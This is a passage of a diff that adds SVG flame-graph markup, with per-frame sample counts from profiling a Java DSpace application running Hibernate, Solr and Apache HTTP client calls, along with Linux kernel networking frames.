+<text  x="781.87" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (10 samples, 0.79%)</title><rect x="822.9" y="373" width="9.4" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="825.89" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/OuterJoinableAssociation:::addJoins (1 samples, 0.08%)</title><rect x="1010.2" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1013.19" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.16%)</title><rect x="1161.0" y="325" width="1.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1163.97" y="335.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (1 samples, 0.08%)</title><rect x="1135.7" y="373" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1138.68" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::initializeEntitiesAndCollections (3 samples, 0.24%)</title><rect x="315.3" y="453" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="318.30" y="463.5" ></text>
+</g>
+<g >
+<title>java/util/ArrayList$Itr:::next (1 samples, 0.08%)</title><rect x="617.8" y="421" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="620.79" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::preProcess (3 samples, 0.24%)</title><rect x="1152.5" y="437" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1155.54" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Bitstream:::getName (1 samples, 0.08%)</title><rect x="778.9" y="485" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="781.87" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.08%)</title><rect x="779.8" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="782.81" y="415.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeIntegerFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="1095.4" y="421" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1098.41" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isCollectionType (1 samples, 0.08%)</title><rect x="1082.3" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1085.30" y="415.5" ></text>
+</g>
+<g >
+<title>Interpreter (1,118 samples, 88.73%)</title><rect x="118.6" y="709" width="1047.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="121.63" y="719.5" >Interpreter</text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::selectFragment (1 samples, 0.08%)</title><rect x="1011.1" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1014.13" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="277" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="287.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (99 samples, 7.86%)</title><rect x="664.6" y="517" width="92.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="667.62" y="527.5" >org/hiberna..</text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeansOfType (4 samples, 0.32%)</title><rect x="1134.7" y="485" width="3.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1137.75" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/EntityEntryContext:::reentrantSafeEntityEntries (4 samples, 0.32%)</title><rect x="307.8" y="421" width="3.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="310.81" y="431.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb_core (1 samples, 0.08%)</title><rect x="96.2" y="421" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="99.16" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::handleResponse (1 samples, 0.08%)</title><rect x="1148.8" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1151.79" y="447.5" ></text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.08%)</title><rect x="158.0" y="341" width="0.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="160.97" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (20 samples, 1.59%)</title><rect x="176.7" y="405" width="18.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="179.70" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::&lt;init&gt; (3 samples, 0.24%)</title><rect x="842.6" y="501" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="845.56" y="511.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/AppenderSkeleton:::doAppend (1 samples, 0.08%)</title><rect x="788.2" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="791.24" y="399.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (1 samples, 0.08%)</title><rect x="1136.6" y="357" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1139.62" y="367.5" ></text>
+</g>
+<g >
+<title>java/lang/Integer:::equals (1 samples, 0.08%)</title><rect x="431.4" y="389" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="434.43" y="399.5" ></text>
+</g>
+<g >
+<title>__send (36 samples, 2.86%)</title><rect x="83.0" y="869" width="33.8" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="86.05" y="879.5" >__..</text>
+</g>
+<g >
+<title>sun/reflect/UnsafeQualifiedObjectFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="959.6" y="405" width="1.0" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="962.62" y="415.5" ></text>
+</g>
+<g >
+<title>tcp_options_write (1 samples, 0.08%)</title><rect x="112.1" y="677" width="0.9" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="115.08" y="687.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.08%)</title><rect x="871.6" y="421" width="0.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="874.59" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (3 samples, 0.24%)</title><rect x="767.6" y="453" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="770.63" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/StatementPreparerImpl$StatementPreparationTemplate:::prepareStatement (1 samples, 0.08%)</title><rect x="783.6" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="786.56" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (3 samples, 0.24%)</title><rect x="735.8" y="453" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="738.79" y="463.5" ></text>
+</g>
+<g >
+<title>__pthread_getspecific (1 samples, 0.08%)</title><rect x="861.3" y="357" width="0.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="864.29" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (2 samples, 0.16%)</title><rect x="780.7" y="453" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="783.75" y="463.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc/PgStatement:::executeInternal (3 samples, 0.24%)</title><rect x="767.6" y="421" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="770.63" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::hasHolder (1 samples, 0.08%)</title><rect x="523.2" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="526.21" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1,118 samples, 88.73%)</title><rect x="118.6" y="629" width="1047.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="121.63" y="639.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>java/util/ArrayList:::iterator (1 samples, 0.08%)</title><rect x="274.1" y="421" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="277.10" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::toColumns (1 samples, 0.08%)</title><rect x="1012.1" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1015.06" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/MultipartEntity:::writeTo (1 samples, 0.08%)</title><rect x="1149.7" y="325" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="335.5" ></text>
+</g>
+<g >
+<title>iptable_filter_hook (1 samples, 0.08%)</title><rect x="89.6" y="597" width="0.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="92.60" y="607.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::hashCode (8 samples, 0.63%)</title><rect x="854.7" y="389" width="7.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="857.73" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (12 samples, 0.95%)</title><rect x="432.4" y="405" width="11.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="435.37" y="415.5" ></text>
+</g>
+<g >
+<title>__x64_sys_recvfrom (23 samples, 1.83%)</title><rect x="60.6" y="821" width="21.5" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="63.57" y="831.5" >_..</text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractType:::isCollectionType (2 samples, 0.16%)</title><rect x="1083.2" y="405" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1086.24" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="133" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="143.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/SolrInputDocument:::addField (2 samples, 0.16%)</title><rect x="764.8" y="517" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="767.83" y="527.5" ></text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (50 samples, 3.97%)</title><rect x="13.7" y="853" width="46.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="16.75" y="863.5" >pthr..</text>
+</g>
+<g >
+<title>__sys_recvfrom (23 samples, 1.83%)</title><rect x="60.6" y="805" width="21.5" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="63.57" y="815.5" >_..</text>
+</g>
+<g >
+<title>__sched_text_start (50 samples, 3.97%)</title><rect x="13.7" y="725" width="46.9" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="16.75" y="735.5" >__sc..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (22 samples, 1.75%)</title><rect x="924.0" y="389" width="20.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="927.03" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/spring/DSpaceBeanPostProcessor:::postProcessBeforeInitialization (3 samples, 0.24%)</title><rect x="1135.7" y="421" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1138.68" y="431.5" ></text>
+</g>
+<g >
+<title>do_softirq_own_stack (17 samples, 1.35%)</title><rect x="94.3" y="517" width="15.9" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="97.29" y="527.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::resolveBeforeInstantiation (1 samples, 0.08%)</title><rect x="1134.7" y="469" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1137.75" y="479.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.08%)</title><rect x="1152.5" y="421" width="1.0" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1155.54" y="431.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.08%)</title><rect x="87.7" y="661" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="90.73" y="671.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::hydrate (1 samples, 0.08%)</title><rect x="774.2" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="777.19" y="431.5" ></text>
+</g>
+<g >
+<title>irq_exit (1 samples, 0.08%)</title><rect x="80.2" y="613" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="83.24" y="623.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (97 samples, 7.70%)</title><rect x="572.8" y="453" width="90.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="575.84" y="463.5" >org/hibern..</text>
+</g>
+<g >
+<title>__dev_queue_xmit (1 samples, 0.08%)</title><rect x="110.2" y="533" width="0.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="113.21" y="543.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group_$$_jvst437_1e:::getHibernateLazyInitializer (1 samples, 0.08%)</title><rect x="410.8" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="413.83" y="431.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb (15 samples, 1.19%)</title><rect x="96.2" y="453" width="14.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="99.16" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/IteratorImpl:::next (1 samples, 0.08%)</title><rect x="1164.7" y="549" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1167.71" y="559.5" ></text>
+</g>
+<g >
+<title>update_blocked_averages (2 samples, 0.16%)</title><rect x="1117.9" y="293" width="1.9" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="1120.89" y="303.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::hashCode (2 samples, 0.16%)</title><rect x="845.4" y="373" width="1.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="848.37" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="798.5" y="277" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="801.54" y="287.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.08%)</title><rect x="1119.8" y="357" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1122.76" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (3 samples, 0.24%)</title><rect x="991.5" y="389" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="994.46" y="399.5" ></text>
+</g>
+<g >
+<title>tick_sched_handle (1 samples, 0.08%)</title><rect x="223.5" y="309" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="226.52" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/HttpEntityWrapper:::isChunked (1 samples, 0.08%)</title><rect x="802.3" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="805.29" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/util/collections/IdentityMap:::entryArray (2 samples, 0.16%)</title><rect x="743.3" y="453" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="746.29" y="463.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (3 samples, 0.24%)</title><rect x="1135.7" y="469" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1138.68" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration$1:::entrySet (1 samples, 0.08%)</title><rect x="1135.7" y="357" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1138.68" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::request (9 samples, 0.71%)</title><rect x="1146.9" y="501" width="8.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1149.92" y="511.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::getArrayProperty (3 samples, 0.24%)</title><rect x="1138.5" y="517" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1141.49" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/EntityEntryContext:::reentrantSafeEntityEntries (3 samples, 0.24%)</title><rect x="653.4" y="437" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="656.38" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/conn/BasicManagedEntity:::&lt;init&gt; (1 samples, 0.08%)</title><rect x="1155.3" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1158.35" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="790.1" y="309" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="793.11" y="319.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::hashCode (1 samples, 0.08%)</title><rect x="1135.7" y="325" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1138.68" y="335.5" ></text>
+</g>
+<g >
+<title>java/net/SocketTimeoutException:::&lt;init&gt; (1 samples, 0.08%)</title><rect x="1150.7" y="261" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1153.67" y="271.5" ></text>
+</g>
+<g >
+<title>org/hibernate/proxy/pojo/javassist/JavassistLazyInitializer:::invoke (1 samples, 0.08%)</title><rect x="232.0" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="234.95" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::fireLoad (3 samples, 0.24%)</title><rect x="758.3" y="485" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (1 samples, 0.08%)</title><rect x="1159.1" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1162.10" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.08%)</title><rect x="727.4" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="730.37" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="117" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="127.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (1 samples, 0.08%)</title><rect x="761.1" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.08" y="383.5" ></text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Decoder:::decode (1 samples, 0.08%)</title><rect x="790.1" y="213" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="793.11" y="223.5" ></text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Encoder:::encodeArrayLoop (1 samples, 0.08%)</title><rect x="788.2" y="309" width="1.0" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="791.24" y="319.5" ></text>
+</g>
+<g >
+<title>x86_pmu_enable (1 samples, 0.08%)</title><rect x="223.5" y="229" width="1.0" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="226.52" y="239.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::add (2 samples, 0.16%)</title><rect x="845.4" y="389" width="1.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="848.37" y="399.5" ></text>
+</g>
+<g >
+<title>handle_irq_event (1 samples, 0.08%)</title><rect x="1124.4" y="357" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1127.44" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (2 samples, 0.16%)</title><rect x="780.7" y="437" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="783.75" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="797.6" y="53" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="800.60" y="63.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (1 samples, 0.08%)</title><rect x="1159.1" y="341" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1162.10" y="351.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::add (13 samples, 1.03%)</title><rect x="852.9" y="405" width="12.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="855.86" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%)</title><rect x="954.0" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="957.00" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isCollectionType (1 samples, 0.08%)</title><rect x="1093.5" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1096.54" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%)</title><rect x="194.5" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="197.49" y="399.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (2 samples, 0.16%)</title><rect x="222.6" y="389" width="1.9" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="225.59" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (10 samples, 0.79%)</title><rect x="792.9" y="453" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (27 samples, 2.14%)</title><rect x="1102.0" y="421" width="25.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1104.97" y="431.5" >o..</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::bindParameterValues (1 samples, 0.08%)</title><rect x="1004.6" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1007.57" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (203 samples, 16.11%)</title><rect x="352.8" y="437" width="190.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="355.76" y="447.5" >org/hibernate/event/inte..</text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (1 samples, 0.08%)</title><rect x="815.4" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="818.40" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (32 samples, 2.54%)</title><rect x="414.6" y="421" width="29.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="417.57" y="431.5" >or..</text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::load (3 samples, 0.24%)</title><rect x="758.3" y="405" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%)</title><rect x="242.3" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="245.25" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::getSubclassPropertyTableNumber (1 samples, 0.08%)</title><rect x="1012.1" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1015.06" y="383.5" ></text>
+</g>
+<g >
+<title>update_sd_lb_stats (1 samples, 0.08%)</title><rect x="59.6" y="645" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="62.63" y="655.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::wasInitialized (1 samples, 0.08%)</title><rect x="872.5" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.52" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (8 samples, 0.63%)</title><rect x="1155.3" y="485" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1158.35" y="495.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::getName (1 samples, 0.08%)</title><rect x="784.5" y="485" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="787.49" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (7 samples, 0.56%)</title><rect x="1148.8" y="469" width="6.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1151.79" y="479.5" ></text>
+</g>
+<g >
+<title>ip_local_deliver (5 samples, 0.40%)</title><rect x="97.1" y="389" width="4.7" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="100.10" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.16%)</title><rect x="1161.0" y="341" width="1.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1163.97" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/BasicLoader:::postInstantiate (2 samples, 0.16%)</title><rect x="1005.5" y="453" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1008.51" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (3 samples, 0.24%)</title><rect x="748.0" y="421" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="750.97" y="431.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::getProperty (4 samples, 0.32%)</title><rect x="1141.3" y="517" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1144.30" y="527.5" ></text>
+</g>
+<g >
+<title>itable stub (9 samples, 0.71%)</title><rect x="1020.5" y="421" width="8.4" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1023.49" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultExpressionEngine:::findNodesForKey (2 samples, 0.16%)</title><rect x="866.0" y="453" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="868.97" y="463.5" ></text>
+</g>
+<g >
+<title>JVM_IHashCode (2 samples, 0.16%)</title><rect x="845.4" y="357" width="1.8" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="848.37" y="367.5" ></text>
+</g>
+<g >
